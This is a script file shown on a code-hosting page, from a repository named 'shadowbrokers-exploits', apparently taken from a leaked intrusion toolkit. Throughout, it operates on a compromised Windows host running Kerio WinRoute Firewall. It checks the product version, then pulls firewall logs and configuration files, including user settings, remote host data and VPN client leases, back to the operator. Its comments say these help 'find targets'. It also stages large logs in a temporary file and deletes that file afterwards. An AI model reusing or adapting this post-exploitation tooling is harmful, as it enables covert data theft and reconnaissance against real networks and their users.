shadowbrokers-exploits/windows/Resources/Ep/Scripts/PSP/kerio.eps

197 lines
5.8 KiB
PostScript
Raw Normal View History

#########################################################################################
# Check Kerio settings and pull configurations
# Written 3/12/10
#########################################################################################
@include "PSPHelpers.epm";
@include "PerlFunctions.epm";
metaData @metaData;
init(@metaData);
# Change this to get more logs....
int $maxLogSize = 100000;
echo "Starting Kerio configuration check....";
string $temp;
@record on;
@echo off;
ifnot (reg_query("software\\kerio\\WinRoute", "Version", $temp)) {
ifnot (reg_query("software\\microsoft\\windows\\currentversion\\uninstall\\{ABF9F762-FF6B-4260-A0FF-579B80260404}", "DisplayVersion", $temp)) {
echo "Can't get version! Check it manually and get guidance.";
@metaData.$version = "unknown";
return false;
}
echo "Version = $temp";
@metaData.$version = $temp;
@metaData.$product = "WinRoute Firewall";
} else {
echo "Version = $temp";
@metaData.$version = $temp;
@metaData.$product = "WinRoute Firewall";
}
@metadata.$vendor = "Kerio";
if(writeMetaData(@metaData)) {
echo "Wrote meta data to disk";
} else {
echo "ERROR: Could not write meta data to disk.";
}
string $systemRoot;
`lpgetenv -option SYSTEMROOT`;
$systemRoot = GetCmdData("value");
#########################################################################################
# Go get the logs
#########################################################################################
`remotelocaltime`;
string $rd;
string $rt;
$rd = GetCmdData("remoteDate");
$rt = GetCmdData("remoteTime");
echo "";
echo "The current target time for reference is $rd $rt";
echo "Checking for recent logs.\n";
echo "Security logs == start and stop of PSP";
echo "Alert logs == Alerts sent to console";
echo "Warning logs == Warnings sent to console";
echo "Connection logs == Shows connection attempts (if configured)\n";
bool $isDir;
int $size;
string $name;
string $path;
`dir "C:\\program files\\kerio\\winroute firewall\\logs\\*"`;
$isDir = GetCmdData("isdir");
$size = GetCmdData("size");
$name = GetCmdData("name");
$path = GetCmdData("path");
int $i = 0;
string $file;
foreach $file ($name) {
ifnot($isDir[$i]) {
# this is a file
string $parts;
$parts = split(".", $file);
# this next part effectively gets rid of .idx files which are currently in use. (you still have to copyget the logs).
if (sizeof($parts) == 2) {
if ($parts[0] == "alert" || $parts[0] == "connection" || $parts[0] == "warning" || $parts[0] == "security") {
getLog("C:\\program files\\kerio\\winroute firewall\\logs", $file, $systemRoot, $maxLogSize);
}
}
}
$i++;
}
#########################################################################################
# Get the configs
#########################################################################################
string $kpath = "C:\\program files\\kerio\\winroute firewall";
echo "\n\nPulling PSP configs...\n";
`dir "$kpath\\winroute.cfg"`;
$size = GetCmdData("size");
echo "Winroute.cfg (main configuration file) is $size bytes.";
if (prompt"Do you want to get the file?") {
`get "$kpath\\winroute.cfg"`;
}
echo "\n\nWe can pull other configs, but these are usually of more interest to find targets, get stats about targets, etc.";
if (prompt "Do you want to pull additional configuration information for possible analysis?") {
echo "Getting userdb.cfg (contains firewall user settings)";
`get "$kpath\\userdb.cfg"`;
echo "Getting host.cfg (contains information about remote hosts)";
`get "$kpath\\host.cfg"`;
echo "Getting logs.cfg (contains information about log locations and rotations)";
`get "$kpath\\logs.cfg"`;
echo "Getting vpnleases.cfg (contains information about VPN clients)";
`get "$kpath\\vpnleases.cfg"`;
`dir "$kpath\\stats.cfg"`;
$size = GetCmdData("size");
if ($size > $maxLogSize) {
echo "stats.log file is $size bytes.";
if (prompt "Do you want to get it?") {
`get "$kpath\\stats.cfg"`;
}
} else {
echo "Getting stats.cfg (contains MRTG like configuration)";
`get "$kpath\\stats.cfg"`;
}
}
@echo on;
@record off;
###################################################
# Offer to get the logs (needs copyget style)
# Since logs can be huge, only get the first X bytes
###################################################
sub getLog(IN string $path, IN string $file, IN string $systemRoot, IN int $maxSize) {
if (`getfileattribs -file "$path\\$file"`) {
string $modDate;
string $modTime;
int $size;
$modDate = GetCmdData("ModifiedDate");
$modTime = GetCmdData("ModifiedTime");
$size = GetCmdData("size");
echo "\n\n$modDate $modTime $size $file";
if ($size == 0) {
echo "File is empty, skipping...";
}
else if ($size < $maxSize) {
if (prompt "Do you want to copyget the file?") {
`copyget "$path\\$file"`;
}
} else {
if (prompt "Do you want to get the last $maxSize bytes of the file?") {
`copy "$path\\$file" "$systemRoot\\at3.tmp"`;
`get "$systemRoot\\at3.tmp" -tail $maxSize -foreground -name $file`;
`del at3.tmp -path "$systemRoot"`;
}
}
} else {
return false;
}
}
sub reg_query(IN string $subkey, IN string $search_values, OUT string $ret)
{
string $values;
string $value;
string $value_data;
int $i=0;
int $j=0;
@record on;
if(`regquery -hive L -subkey "$subkey"`)
{
$values = GetCmdData("value");
$value_data = GetCmdData("value_data");
string $search_value;
foreach $search_value ($search_values)
{
$j = 0;
foreach $value ($values)
{
if($value == $search_value)
{
$ret[$i] = $value_data[$j];
}
$j++;
}
$i++;
}
ifnot(defined($ret)) {
$ret = "NTR";
}
return true;
} else {
return false;
}
}